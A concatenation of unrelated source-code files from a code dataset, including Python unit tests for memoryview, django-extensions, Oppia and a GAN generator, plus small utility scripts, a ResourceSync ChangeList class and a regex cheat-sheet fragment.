BaseMemorySliceTests, BaseArrayMemoryTests):
pass
class BytesMemorySliceSliceTest(unittest.TestCase,
BaseMemorySliceSliceTests, BaseBytesMemoryTests):
pass
class ArrayMemorySliceSliceTest(unittest.TestCase,
BaseMemorySliceSliceTests, BaseArrayMemoryTests):
pass
class OtherTest(unittest.TestCase):
def test_ctypes_cast(self):
# Issue 15944: Allow all source formats when casting to bytes.
ctypes = test.support.import_module("ctypes")
p6 = bytes(ctypes.c_double(0.6))
d = ctypes.c_double()
m = memoryview(d).cast("B")
m[:2] = p6[:2]
m[2:] = p6[2:]
self.assertEqual(d.value, 0.6)
for format in "Bbc":
with self.subTest(format):
d = ctypes.c_double()
m = memoryview(d).cast(format)
m[:2] = memoryview(p6).cast(format)[:2]
m[2:] = memoryview(p6).cast(format)[2:]
self.assertEqual(d.value, 0.6)
def test_memoryview_hex(self):
# Issue #9951: memoryview.hex() segfaults with non-contiguous buffers.
x = b'0' * 200000
m1 = memoryview(x)
m2 = m1[::-1]
self.assertEqual(m2.hex(), '30' * 200000)
def test_copy(self):
m = memoryview(b'abc')
with self.assertRaises(TypeError):
copy.copy(m)
def test_pickle(self):
m = memoryview(b'abc')
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.assertRaises(TypeError):
pickle.dumps(m, proto)
if __name__ == "__main__":
unittest.main()
|
the-stack_106_19019
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from ._metric_baseline_operations import MetricBaselineOperations
__all__ = [
'MetricBaselineOperations',
]
|
the-stack_106_19020
|
import time
from rpi.gpio import setup, cleanup, CkPin
from rpi.gpio.controls import TwoPoleButton
from rpi.gpio.lights import LedBar
def main():
"""
This example switches the LEDs within the LED bar in a flowing manner, and it does this once each time a button is
pressed. It runs with the circuit described on page 72 of the tutorial, with the addition of a button circuit like
the one shown on page 59.
"""
setup()
led_bar = LedBar(
output_pins=[
CkPin.GPIO17,
CkPin.GPIO18,
CkPin.GPIO27,
CkPin.GPIO22,
CkPin.GPIO23,
CkPin.GPIO24,
CkPin.GPIO25,
CkPin.SDA1,
CkPin.SCL1,
CkPin.CE0
],
reverse=True
)
button = TwoPoleButton(input_pin=CkPin.GPIO12, bounce_time_ms=50)
button.event(lambda s: led_bar.flow(0.03) if s.pressed else None)
print('You have 20 seconds to press the button...')
time.sleep(20)
cleanup()
if __name__ == '__main__':
main()
|
the-stack_106_19021
|
import numpy as np
import tensorflow as tf
from models.generator import SNGANGenerator
class SNGANGeneratorTest(tf.test.TestCase):
def testInit(self):
SNGANGenerator()
def testBuildAndRun(self):
N = 5
z_size = 10
z = tf.initializers.random_normal()((N, z_size))
sng = SNGANGenerator(category=5)
y = [[0]] * N
outputs = sng(z, labels=y)
o_H = sng._bottom_w * (2 ** 5)
self.assertEqual((N, o_H, o_H, 3), outputs.shape)
def testTrain(self):
N = 5
z_size = 10
z = tf.initializers.random_normal()((N, z_size))
sng = SNGANGenerator(category=5)
y = [[0]] * N
with tf.GradientTape() as tape:
outputs = sng(z, labels=y)
loss = tf.reduce_mean(tf.square(1 - outputs))
grads = tape.gradient(loss, sng.variables)
optimizer = tf.train.GradientDescentOptimizer(0.001)
optimizer.apply_gradients(zip(grads, sng.variables))
|
the-stack_106_19022
|
# -*- coding: utf-8 -*-
import mock
import os
import sys
import shutil
import logging
import importlib
import django
from django.core.management import call_command, find_commands, load_command_class
from django.test import TestCase
from django.utils.six import StringIO, PY3
from django_extensions.management.modelviz import use_model, generate_graph_data
from django_extensions.management.commands.merge_model_instances import \
get_model_to_deduplicate, \
get_field_names, \
keep_first_or_last_instance
from . import force_color_support
from .testapp.models import Person, Name, Note, Personality, Club, Membership, \
Permission
from .testapp.jobs.hourly.test_hourly_job import HOURLY_JOB_MOCK
from .testapp.jobs.daily.test_daily_job import DAILY_JOB_MOCK
from .testapp.jobs.weekly.test_weekly_job import WEEKLY_JOB_MOCK
from .testapp.jobs.monthly.test_monthly_job import MONTHLY_JOB_MOCK
from .testapp.jobs.yearly.test_yearly_job import YEARLY_JOB_MOCK
class MockLoggingHandler(logging.Handler):
""" Mock logging handler to check for expected logs. """
def __init__(self, *args, **kwargs):
self.reset()
logging.Handler.__init__(self, *args, **kwargs)
def emit(self, record):
self.messages[record.levelname.lower()].append(record.getMessage())
def reset(self):
self.messages = {
'debug': [],
'info': [],
'warning': [],
'error': [],
'critical': [],
}
class CommandTest(TestCase):
def test_error_logging(self):
# Ensure command errors are properly logged and reraised
from django_extensions.management.base import logger
logger.addHandler(MockLoggingHandler())
module_path = "tests.management.commands.error_raising_command"
module = importlib.import_module(module_path)
error_raising_command = module.Command()
self.assertRaises(Exception, error_raising_command.execute)
handler = logger.handlers[0]
self.assertEqual(len(handler.messages['error']), 1)
class ShowTemplateTagsTests(TestCase):
def test_some_output(self):
out = StringIO()
call_command('show_template_tags', stdout=out)
output = out.getvalue()
        # Once django_extensions is installed during tests it should appear with
# its templatetags
self.assertIn('django_extensions', output)
# let's check at least one
self.assertIn('truncate_letters', output)
class CreateAppTests(TestCase):
def test_command(self):
if django.VERSION[:2] >= (1, 10):
return
tmpname = "testapptest"
# TODO better temp dir handling
tmpdir = "/tmp"
tmppath = os.path.join(tmpdir, tmpname)
self.assertFalse(os.path.isdir(tmppath))
out = StringIO()
try:
call_command('create_app', tmpname, parent_path=tmpdir, stdout=out)
finally:
if os.path.isdir(tmppath):
shutil.rmtree(tmppath)
output = out.getvalue()
self.assertIn("Application '%s' created." % tmpname, output)
class AdminGeneratorTests(TestCase):
def test_command(self):
out = StringIO()
call_command('admin_generator', 'django_extensions', stdout=out)
output = out.getvalue()
self.assertIn("@admin.register(Secret)", output)
self.assertIn("class SecretAdmin(admin.ModelAdmin):", output)
if PY3:
self.assertIn("list_display = ('id', 'name', 'text')", output)
self.assertIn("search_fields = ('name',)", output)
else:
self.assertIn("list_display = (u'id', u'name', u'text')", output)
self.assertIn("search_fields = (u'name',)", output)
class DescribeFormTests(TestCase):
def test_command(self):
out = StringIO()
call_command('describe_form', 'django_extensions.Secret', stdout=out)
output = out.getvalue()
self.assertIn("class SecretForm(forms.Form):", output)
        self.assertRegexpMatches(output, r"name = forms.CharField\(.*max_length=255")
        self.assertRegexpMatches(output, r"name = forms.CharField\(.*required=False")
        self.assertRegexpMatches(output, r"name = forms.CharField\(.*label=u?'Name'")
        self.assertRegexpMatches(output, r"text = forms.CharField\(.*required=False")
        self.assertRegexpMatches(output, r"text = forms.CharField\(.*label=u?'Text'")
class UpdatePermissionsTests(TestCase):
def test_works(self):
from django.db import models
class PermModel(models.Model):
class Meta:
app_label = 'django_extensions'
permissions = (('test_permission', 'test_permission'),)
original_stdout = sys.stdout
out = sys.stdout = StringIO()
call_command('update_permissions', stdout=out, verbosity=3)
sys.stdout = original_stdout
self.assertIn("Can change perm model", out.getvalue())
class CommandSignalTests(TestCase):
pre = None
post = None
def test_works(self):
from django_extensions.management.signals import post_command, \
pre_command
from django_extensions.management.commands.show_template_tags import \
Command
def pre(sender, **kwargs):
CommandSignalTests.pre = dict(**kwargs)
def post(sender, **kwargs):
CommandSignalTests.post = dict(**kwargs)
pre_command.connect(pre, Command)
post_command.connect(post, Command)
out = StringIO()
call_command('show_template_tags', stdout=out)
self.assertIn('args', CommandSignalTests.pre)
self.assertIn('kwargs', CommandSignalTests.pre)
self.assertIn('args', CommandSignalTests.post)
self.assertIn('kwargs', CommandSignalTests.post)
self.assertIn('outcome', CommandSignalTests.post)
class CommandClassTests(TestCase):
def setUp(self):
management_dir = os.path.join('django_extensions', 'management')
self.commands = find_commands(management_dir)
def test_load_commands(self):
"""Try to load every management command to catch exceptions."""
try:
for command in self.commands:
load_command_class('django_extensions', command)
except Exception as e:
self.fail("Can't load command class of {0}\n{1}".format(command, e))
class GraphModelsTests(TestCase):
"""
Tests for the `graph_models` management command.
"""
def test_use_model(self):
include_models = [
'NoWildcardInclude',
'Wildcard*InsideInclude',
'*WildcardPrefixInclude',
'WildcardSuffixInclude*',
'*WildcardBothInclude*'
]
exclude_models = [
'NoWildcardExclude',
'Wildcard*InsideExclude',
'*WildcardPrefixExclude',
'WildcardSuffixExclude*',
'*WildcardBothExclude*'
]
# Any model name should be used if neither include or exclude
# are defined.
self.assertTrue(use_model(
'SomeModel',
None,
None
))
# Any model name should be allowed if `*` is in `include_models`.
self.assertTrue(use_model(
'SomeModel',
['OtherModel', '*', 'Wildcard*Model'],
None
))
# No model name should be allowed if `*` is in `exclude_models`.
self.assertFalse(use_model(
'SomeModel',
None,
['OtherModel', '*', 'Wildcard*Model']
))
# Some tests with the `include_models` defined above.
self.assertFalse(use_model(
'SomeModel',
include_models,
None
))
self.assertTrue(use_model(
'NoWildcardInclude',
include_models,
None
))
self.assertTrue(use_model(
'WildcardSomewhereInsideInclude',
include_models,
None
))
self.assertTrue(use_model(
'MyWildcardPrefixInclude',
include_models,
None
))
self.assertTrue(use_model(
'WildcardSuffixIncludeModel',
include_models,
None
))
self.assertTrue(use_model(
'MyWildcardBothIncludeModel',
include_models,
None
))
# Some tests with the `exclude_models` defined above.
self.assertTrue(use_model(
'SomeModel',
None,
exclude_models
))
self.assertFalse(use_model(
'NoWildcardExclude',
None,
exclude_models
))
self.assertFalse(use_model(
'WildcardSomewhereInsideExclude',
None,
exclude_models
))
self.assertFalse(use_model(
'MyWildcardPrefixExclude',
None,
exclude_models
))
self.assertFalse(use_model(
'WildcardSuffixExcludeModel',
None,
exclude_models
))
self.assertFalse(use_model(
'MyWildcardBothExcludeModel',
None,
exclude_models
))
def test_no_models_dot_py(self):
data = generate_graph_data(['testapp_with_no_models_file'])
self.assertEqual(len(data['graphs']), 1)
model_name = data['graphs'][0]['models'][0]['name']
self.assertEqual(model_name, 'TeslaCar')
class ShowUrlsTests(TestCase):
"""
Tests for the `show_urls` management command.
"""
def test_color(self):
with force_color_support:
out = StringIO()
call_command('show_urls', stdout=out)
self.output = out.getvalue()
self.assertIn('\x1b', self.output)
def test_no_color(self):
with force_color_support:
out = StringIO()
call_command('show_urls', '--no-color', stdout=out)
self.output = out.getvalue()
self.assertNotIn('\x1b', self.output)
class MergeModelInstancesTests(TestCase):
"""
Tests for the `merge_model_instances` management command.
"""
@mock.patch('django_extensions.management.commands.merge_model_instances.apps.get_models')
@mock.patch('django_extensions.management.commands.merge_model_instances.input')
def test_get_model_to_merge(self, test_input, get_models):
class Model(object):
__name__ = ""
return_value = []
for v in ["one", "two", "three"]:
instance = Model()
instance.__name__ = v
return_value.append(instance)
get_models.return_value = return_value
test_input.return_value = 2
model_to_deduplicate = get_model_to_deduplicate()
self.assertEqual(model_to_deduplicate.__name__, "two")
@mock.patch('django_extensions.management.commands.merge_model_instances.input')
def test_get_field_names(self, test_input):
class Field(object):
name = ""
def __init__(self, name):
self.name = name
class Model(object):
__name__ = ""
one = Field(name="one")
two = Field(name="two")
three = Field(name="three")
return_value = [Model().__getattribute__(field) for field in dir(Model()) if not field.startswith("__")]
Model._meta = mock.MagicMock()
Model._meta.get_fields = mock.MagicMock(return_value=return_value)
# Choose the second return_value
test_input.side_effect = [2, "C"]
field_names = get_field_names(Model())
# Test that the second return_value returned
self.assertEqual(field_names, [return_value[1].name])
@mock.patch('django_extensions.management.commands.merge_model_instances.input')
def test_keep_first_or_last_instance(self, test_input):
test_input.side_effect = ["xxxx", "first", "last"]
first_or_last = keep_first_or_last_instance()
self.assertEqual(first_or_last, "first")
first_or_last = keep_first_or_last_instance()
self.assertEqual(first_or_last, "last")
@mock.patch('django_extensions.management.commands.merge_model_instances.get_model_to_deduplicate')
@mock.patch('django_extensions.management.commands.merge_model_instances.get_field_names')
@mock.patch('django_extensions.management.commands.merge_model_instances.keep_first_or_last_instance')
def test_merge_model_instances(self, keep_first_or_last_instance, get_field_names, get_model_to_deduplicate):
get_model_to_deduplicate.return_value = Person
get_field_names.return_value = ["name"]
keep_first_or_last_instance.return_value = "first"
name = Name.objects.create(name="Name")
note = Note.objects.create(note="This is a note.")
personality_1 = Personality.objects.create(
description="Child 1's personality.")
personality_2 = Personality.objects.create(
description="Child 2's personality.")
child_1 = Person.objects.create(
name=Name.objects.create(name="Child1"),
age=10,
personality=personality_1
)
child_1.notes.add(note)
child_2 = Person.objects.create(
name=Name.objects.create(name="Child2"),
age=10,
personality=personality_2
)
child_2.notes.add(note)
club1 = Club.objects.create(name="Club one")
club2 = Club.objects.create(name="Club two")
person_1 = Person.objects.create(
name=name,
age=50,
personality=Personality.objects.create(
description="First personality")
)
person_1.children.add(child_1)
person_1.notes.add(note)
Permission.objects.create(text="Permission", person=person_1)
person_2 = Person.objects.create(
name=name,
age=50,
personality=Personality.objects.create(
description="Second personality")
)
person_2.children.add(child_2)
new_note = Note.objects.create(note="This is a new note")
person_2.notes.add(new_note)
Membership.objects.create(club=club1, person=person_2)
Membership.objects.create(club=club1, person=person_2)
Permission.objects.create(text="Permission", person=person_2)
person_3 = Person.objects.create(
name=name,
age=50,
personality=Personality.objects.create(
description="Third personality")
)
person_3.children.add(child_2)
person_3.notes.add(new_note)
Membership.objects.create(club=club2, person=person_3)
Membership.objects.create(club=club2, person=person_3)
Permission.objects.create(text="Permission", person=person_3)
self.assertEqual(Person.objects.count(), 5)
self.assertEqual(Membership.objects.count(), 4)
out = StringIO()
call_command('merge_model_instances', stdout=out)
        self.output = out.getvalue()
self.assertEqual(Person.objects.count(), 3)
person = Person.objects.get(name__name="Name")
self.assertRaises(
Person.DoesNotExist,
lambda: Person.objects.get(
personality__description="Second personality"))
self.assertEqual(person.notes.count(), 2)
self.assertEqual(person.clubs.distinct().count(), 2)
self.assertEqual(person.permission_set.count(), 3)
self.assertRaises(
Personality.DoesNotExist,
lambda: Personality.objects.get(description="Second personality"))
class RunJobsTests(TestCase):
"""
Tests for the `runjobs` management command.
"""
@mock.patch('django_extensions.management.commands.runjobs.Command.runjobs_by_signals')
@mock.patch('django_extensions.management.commands.runjobs.Command.runjobs')
@mock.patch('django_extensions.management.commands.runjobs.Command.usage_msg')
def test_runjobs_management_command(
self, usage_msg, runjobs, runjobs_by_signals):
when = 'daily'
call_command('runjobs', when)
usage_msg.assert_not_called()
runjobs.assert_called_once()
runjobs_by_signals.assert_called_once()
self.assertEqual(runjobs.call_args[0][0], when)
@mock.patch('django_extensions.management.commands.runjobs.Command.runjobs_by_signals')
@mock.patch('django_extensions.management.commands.runjobs.Command.runjobs')
@mock.patch('django_extensions.management.commands.runjobs.Command.usage_msg')
def test_runjobs_management_command_invalid_when(
self, usage_msg, runjobs, runjobs_by_signals):
when = 'invalid'
call_command('runjobs', when)
usage_msg.assert_called_once_with()
runjobs.assert_not_called()
runjobs_by_signals.assert_not_called()
def test_runjobs_integration_test(self):
jobs = [
("hourly", HOURLY_JOB_MOCK),
("daily", DAILY_JOB_MOCK),
("monthly", MONTHLY_JOB_MOCK),
("weekly", WEEKLY_JOB_MOCK),
("yearly", YEARLY_JOB_MOCK),
]
# Reset all mocks in case they have been called elsewhere.
for job in jobs:
job[1].reset_mock()
counter = 1
for job in jobs:
call_command('runjobs', job[0], verbosity=2)
for already_called in jobs[:counter]:
already_called[1].assert_called_once_with()
for not_yet_called in jobs[counter:]:
not_yet_called[1].assert_not_called()
counter += 1
def test_runjob_integration_test(self):
jobs = [
("test_hourly_job", HOURLY_JOB_MOCK),
("test_daily_job", DAILY_JOB_MOCK),
("test_monthly_job", MONTHLY_JOB_MOCK),
("test_weekly_job", WEEKLY_JOB_MOCK),
("test_yearly_job", YEARLY_JOB_MOCK),
]
# Reset all mocks in case they have been called elsewhere.
for job in jobs:
job[1].reset_mock()
counter = 1
for job in jobs:
call_command('runjob', job[0], verbosity=2)
for already_called in jobs[:counter]:
already_called[1].assert_called_once_with()
for not_yet_called in jobs[counter:]:
not_yet_called[1].assert_not_called()
counter += 1
|
the-stack_106_19024
|
# coding: utf-8
#
# Copyright 2019 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for feature detection utilities for Python 2 and Python 3."""
from __future__ import annotations
import ast
import builtins
import io
import os
import sys
import unittest
import urllib
from core import python_utils
from core.tests import test_utils
from core.tests.data import unicode_and_str_handler
class PythonUtilsTests(test_utils.GenericTestBase):
"""Tests for feature detection utilities that are common for Python 2 and
Python 3.
"""
def test_get_args_of_function_node(self):
function_txt = b"""def _mock_function(arg1, arg2):
pass"""
ast_node = ast.walk(ast.parse(function_txt))
function_node = [n for n in ast_node if isinstance(n, ast.FunctionDef)]
args_list = python_utils.get_args_of_function_node(function_node[0], [])
self.assertEqual(args_list, ['arg1', 'arg2'])
def test_open_file(self):
with python_utils.open_file(
os.path.join('core', 'python_utils.py'), 'r'
) as f:
file_content = f.readlines()
self.assertIsNotNone(file_content)
def test_can_not_open_file(self):
with self.assertRaisesRegexp(
IOError, 'Unable to open file: invalid_file.py'):
with python_utils.open_file('invalid_file.py', 'r') as f:
f.readlines()
def test_url_open(self):
response = python_utils.url_open('http://www.google.com')
self.assertEqual(response.getcode(), 200)
self.assertEqual(response.url, 'http://www.google.com')
def test_url_request(self):
response = python_utils.url_request('http://www.google.com', None, {})
self.assertEqual(response.get_full_url(), 'http://www.google.com')
def test_divide(self):
self.assertEqual(python_utils.divide(4, 2), 2)
self.assertEqual(python_utils.divide(5, 2), 2)
def test_url_unsplit(self):
response = urllib.parse.urlsplit('http://www.google.com')
self.assertEqual(
python_utils.url_unsplit(response), 'http://www.google.com')
def test_parse_query_string(self):
response = python_utils.parse_query_string(
'http://www.google.com?search=oppia')
self.assertEqual(response, {'http://www.google.com?search': ['oppia']})
def test_urllib_unquote(self):
response = python_utils.urllib_unquote('/El%20Ni%C3%B1o/')
self.assertEqual(response, '/El Niño/')
def test_url_parse(self):
response = python_utils.url_parse('http://www.google.com')
self.assertEqual(response.geturl(), 'http://www.google.com')
def test_recursively_convert_to_str_with_dict(self):
test_var_1_in_unicode = str('test_var_1')
test_var_2_in_unicode = str('test_var_2')
test_var_3_in_bytes = test_var_1_in_unicode.encode(encoding='utf-8')
test_var_4_in_bytes = test_var_2_in_unicode.encode(encoding='utf-8')
test_dict = {
test_var_1_in_unicode: test_var_3_in_bytes,
test_var_2_in_unicode: test_var_4_in_bytes
}
self.assertEqual(
test_dict,
{'test_var_1': b'test_var_1', 'test_var_2': b'test_var_2'})
for key, val in test_dict.items():
self.assertEqual(type(key), str)
self.assertEqual(type(val), builtins.bytes)
dict_in_str = python_utils._recursively_convert_to_str(test_dict) # pylint: disable=protected-access
self.assertEqual(
dict_in_str,
{'test_var_1': 'test_var_1', 'test_var_2': 'test_var_2'})
for key, val in dict_in_str.items():
self.assertEqual(type(key), str)
self.assertEqual(type(val), str)
def test_recursively_convert_to_str_with_nested_structure(self):
test_var_1_in_unicode = str('test_var_1')
test_list_1 = [
test_var_1_in_unicode,
test_var_1_in_unicode.encode(encoding='utf-8'),
'test_var_2',
b'test_var_3',
{'test_var_4': b'test_var_5'}
]
test_dict = {test_var_1_in_unicode: test_list_1}
self.assertEqual(
test_dict,
{
'test_var_1': [
'test_var_1', b'test_var_1', 'test_var_2', b'test_var_3',
{'test_var_4': b'test_var_5'}]
}
)
dict_in_str = python_utils._recursively_convert_to_str(test_dict) # pylint: disable=protected-access
self.assertEqual(
dict_in_str,
{
'test_var_1': [
'test_var_1', 'test_var_1', 'test_var_2', 'test_var_3',
{'test_var_4': 'test_var_5'}]
}
)
for key, value in dict_in_str.items():
self.assertNotEqual(type(key), builtins.bytes)
self.assertTrue(isinstance(key, str))
for item in value:
self.assertNotEqual(type(item), builtins.bytes)
self.assertTrue(isinstance(item, (str, bytes, dict)))
for k, v in value[-1].items():
self.assertEqual(type(k), str)
self.assertEqual(type(v), str)
def test_create_enum_method_and_check_its_values(self):
"""Test create_enum method."""
enums = python_utils.create_enum('first', 'second', 'third')
self.assertEqual(enums.first.value, 'first')
self.assertEqual(enums.second.value, 'second')
self.assertEqual(enums.third.value, 'third')
def test_create_enum_method_and_check_its_names(self):
"""Test create_enum method."""
enums = python_utils.create_enum('first', 'second', 'third')
self.assertEqual(enums.first.name, 'first')
self.assertEqual(enums.second.name, 'second')
self.assertEqual(enums.third.name, 'third')
def test_enum_for_invalid_attribute(self):
enums = python_utils.create_enum('first', 'second', 'third')
with self.assertRaisesRegexp(AttributeError, 'fourth'):
getattr(enums, 'fourth')
@unittest.skipUnless(
sys.version[0] == '3', 'Test cases for ensuring Python 3 behavior only')
class PythonUtilsForPython3Tests(test_utils.GenericTestBase):
"""Tests for feature detection utilities for Python 3."""
def test_string_io(self):
stdout = python_utils.string_io()
self.assertIsInstance(stdout, io.StringIO)
def test_unicode_and_str_chars_in_file(self):
self.assertIsInstance(unicode_and_str_handler.SOME_STR_TEXT, str)
self.assertIsInstance(
unicode_and_str_handler.SOME_UNICODE_TEXT, str)
self.assertIsInstance(
unicode_and_str_handler.SOME_BINARY_TEXT, bytes)
with python_utils.open_file(
'core/tests/data/unicode_and_str_handler.py', 'r') as f:
file_content = f.read()
self.assertIsInstance(file_content, str)
|
the-stack_106_19026
|
#!/usr/bin/env python3
import os
import math
from pointclass import *
from placefods import *
#check for input file
if os.path.exists('fod_input'):
f1=open('fod_input')
else:
print('no fod_input file found')
raise SystemExit(0)
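#example fod_input lines (illustrative values only; they match the formats parsed below)
#  point 0.0 0.0 0.0
#  tetrahedron 1.0 0.0 0.0 1 1.3 pointto 0.0 0.0 0.0
#  db 0.0 0.0 0.0 1.4 0.0 0.0 0.3 5.0 1.0 0.0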
#remove old outputs
if os.path.exists('tmp.xyz'):
os.remove('tmp.xyz')
count=0
for line in f1:
args = line.split()
narg = len(args)
if narg == 0:
continue
#TETRAHEDRON
# 0 1 2 3 4 5 6 7 8 9 10 11 12 13
# tetrahedron ax ay az size tsize pointto bx by bz (optional: alignto cx cy cz)
if args[0].lower() == 'tetrahedron':
center=Point(float(args[1]),float(args[2]),float(args[3]))
tsize = float(args[5])
bondatom=Point(float(args[7]),float(args[8]),float(args[9]))
        if narg > 10 and args[10] == 'alignto':
alignatom=Point(float(args[11]),float(args[12]),float(args[13]))
place_tetrahedron(center,tsize,bondatom,alignatom)
else:
place_tetrahedron(center,tsize,bondatom)
count+=4
# 0 1 2 3
# point ax ay az
elif args[0].lower() == 'point':
center=Point(float(args[1]),float(args[2]),float(args[3]))
place_fod(center)
count+=1
#DOUBLE BOND
# 0 1 2 3 4 5 6 7 8 9 10
# db ax ay az bx by bz dist cx cy cz
elif args[0].lower() == 'db':
atom1=Point(float(args[1]),float(args[2]),float(args[3]))
atom2=Point(float(args[4]),float(args[5]),float(args[6]))
dist = float(args[7])
planeatom=Point(float(args[8]),float(args[9]),float(args[10]))
place_doublebond(atom1,atom2,dist,planeatom)
count+=2
print('DONE READING')
#write to xyz with number of FODS on first line
f2=open('new.xyz','w')
line = str(count) + '\n\n'
f2.write(line)
f1=open('tmp.xyz','r')
for line in f1:
f2.write(line)
#remove tmp file
os.remove('tmp.xyz')
#center1=Point(-5,5,5)
#tsize=1.3
#bondatom=Point(0,0,0)
#place_tetrahedron(center1,tsize,bondatom)
# place 1 FOD
#center1=Point(5,5,5)
#place_fod(center1)
#place_COH(oxygencenter,directions)
|
the-stack_106_19030
|
"""Support testing with Pytest."""
import pytest
import os
import logging
from asgi_tools.tests import manage_lifespan
from . import TestClient
def pytest_addoption(parser):
"""Append pytest options for testing Muffin apps."""
parser.addini('muffin_app', 'Set path to muffin application')
parser.addoption('--muffin-app', dest='muffin_app', help='Set to muffin application')
parser.addini('muffin_config', 'Set module path to muffin configuration')
parser.addoption('--muffin-config', dest='muffin_config',
help='Set module path to muffin configuration')
def pytest_load_initial_conftests(early_config, parser, args):
"""Prepare to loading Muffin application."""
from muffin import CONFIG_ENV_VARIABLE
options = parser.parse_known_args(args)
# Initialize configuration
config = options.muffin_config or early_config.getini('muffin_config')
if config:
os.environ[CONFIG_ENV_VARIABLE] = config
# Initialize application
app_ = options.muffin_app or early_config.getini('muffin_app')
early_config.app = app_
@pytest.fixture(scope='session')
async def app(pytestconfig, request, aiolib):
"""Load an application, run lifespan events, prepare plugins."""
if not pytestconfig.app:
logging.warning(
'Improperly configured. Please set ``muffin_app`` in your pytest config. '
'Or use ``--muffin-app`` command option.')
return
from muffin.utils import import_app
app = import_app(pytestconfig.app)
msg = f"Setup application '{app.cfg.name}'"
if app.cfg.config:
msg += f"with config '{app.cfg.config}'"
app.logger.info(msg)
async with manage_lifespan(app):
# Setup plugins
for plugin in app.plugins.values():
if hasattr(plugin, 'conftest') and plugin.conftest is not None:
app.logger.info(f"Setup plugin '{plugin.name}'")
await plugin.conftest()
yield app
@pytest.fixture
def client(app):
"""Generate a test client for the app."""
return TestClient(app)
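# Example of a downstream test that uses the fixtures above (illustrative sketch;
# the '/' route and the response attribute name are assumptions about the project
# under test, not something defined in this module):
#
#     async def test_index(client):
#         response = await client.get('/')
#         assert response.status_code == 200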
|
the-stack_106_19031
|
"""ResourceSync ChangeList object.
A ChangeList is a list of resource descriptions which includes
both metadata associated with the resource at some point in
time, and also metadata about a change that may have occurred
to bring the resource to that states. These descriptions
are Resource objects.
Different from a resource_list, a change_list may include multiple
descriptions for the same resource. The change_list is ordered
from first entry to last entry.
Different from a resource_list, dereferencing by a URI yields a
ChangeList containing descriptions pertaining to that
particular resource.
"""
import collections.abc
from .list_base_with_index import ListBaseWithIndex
from .resource import Resource, ChangeTypeError
from .sitemap import Sitemap
class ChangeList(ListBaseWithIndex):
"""Class representing an Change List."""
def __init__(self, resources=None, md=None, ln=None, uri=None,
mapper=None, spec_version='1.1', add_lastmod=False,
resources_class=list):
"""Initialize ChangeList."""
super(ChangeList, self).__init__(
resources=resources, md=md, ln=ln, uri=uri,
capability_name='changelist', mapper=mapper,
spec_version=spec_version, add_lastmod=add_lastmod,
resources_class=resources_class)
def add_if_changed(self, resource):
"""Add resource if change is not None else ChangeTypeError."""
if (resource.change is not None):
self.resources.append(resource)
else:
raise ChangeTypeError(resource.change)
def add(self, resource):
"""Add a resource change or an iterable collection of them.
Allows multiple resource_change objects for the same
resource (ie. URI) and preserves the order of addition.
"""
if isinstance(resource, collections.abc.Iterable):
for r in resource:
self.add_if_changed(r)
else:
self.add_if_changed(resource)
def add_changed_resources(self, resources, change=None):
"""Add items from a ResourceContainer resources.
If change is specified then the attribute is set in the Resource
objects created.
"""
for resource in resources:
rc = Resource(resource=resource, change=change)
self.add(rc)
def prune_updates_before(self, timestamp, spec_version='1.1'):
"""Remove all resource updates earlier than the given timestamp.
        Returns the number of entries removed. Will raise an exception
if there are any entries without a datetime (1.1) or
timestamp (1.0).
"""
n = 0
pruned = []
use_timestamp = (spec_version == '1.0') # Else use datetime
for r in self.resources:
ts = r.timestamp if use_timestamp else r.ts_datetime
if (ts is None):
raise Exception("Entry %s has no update datetime/timestamp" % (r.uri))
elif (ts >= timestamp):
pruned.append(r)
else:
n += 1
self.resources = pruned
return(n)
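# Minimal usage sketch (not part of the library; the URIs are illustrative and the
# Resource keyword arguments mirror those used by add_changed_resources above).
if __name__ == "__main__":  # pragma: no cover
    cl = ChangeList()
    cl.add(Resource(uri="http://example.org/res1", change="created"))
    cl.add(Resource(uri="http://example.org/res2", change="updated"))
    try:
        cl.add(Resource(uri="http://example.org/res3"))  # no change type set
    except ChangeTypeError:
        pass  # add() only accepts resources that carry a change type
    print([(r.uri, r.change) for r in cl.resources])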
|
the-stack_106_19032
|
import random
import fractions
from math import ceil, floor
times = input("How many times do you want to try: ")
for i in range(int(times)):
print("\n", i + 1, ":", end='')
v = random.randint(1, 250)
m = random.randint(1, 114514) * 100
pMetal = random.randint(ceil(m/v), 200) * 100
pTree = random.randint(5, floor(m/v)) * 100
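    # The reference answer solves the linear system
    #   vMetal + vTree = v
    #   pMetal * vMetal + pTree * vTree = m
    # which gives vMetal = (m - pTree * v) / (pMetal - pTree); Fraction keeps this exact.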
vMetal = fractions.Fraction(m - pTree * v, pMetal - pTree)
vTree = v - vMetal
# if vMetal <= 0 or vTree <= 0:
# print("FAILED")
# continue
mMetal = pMetal * vMetal
mTree = pTree * vTree
vMetalValue = round(vMetal.numerator/vMetal.denominator, 2)
vTreeValue = round(vTree.numerator/vTree.denominator, 2)
mMetalValue = round(mMetal.numerator/mMetal.denominator, 2)
    mTreeValue = round(mTree.numerator/mTree.denominator, 2)
print("一只鲸鱼总容积为 {} 立方米,所能承载的物质质量最大为 {} 千克,现在要用木头和金属放满整只鲸鱼。已知木头的密度为 {} 千克每立方米,金属的密度为 {} 千克每立方米,求应放质量为多少的木头和金属。"
.format(v, m, pTree, pMetal))
print("参考答案:木头质量为{}千克,金属质量为{}千克,木头体积为{}立方米,金属体积为{}立方米。".format(mTreeValue, mMetalValue, vTreeValue, vMetalValue))
print("Done.")
|
the-stack_106_19033
|
'''
Identifiers:
\d any number
\D anything but a number
\s any whitespace character
\S anything but whitespace
\w any word character (letter, digit, or underscore)
\W anything but a word character
. any character, except for a newline
\b word boundary (zero-width, at the start or end of a word)
\. a period
Modifiers:
{1,3} we're expecting 1-3
+ Match 1 or more
? Match 0 or 1
* Match 0 or more
$ match the end of a string
^ matching the beginning of a string
| either or
[] range or "variance" [1-5a-qA-Z]
{x} expecting "x" amount
White Space Characters:
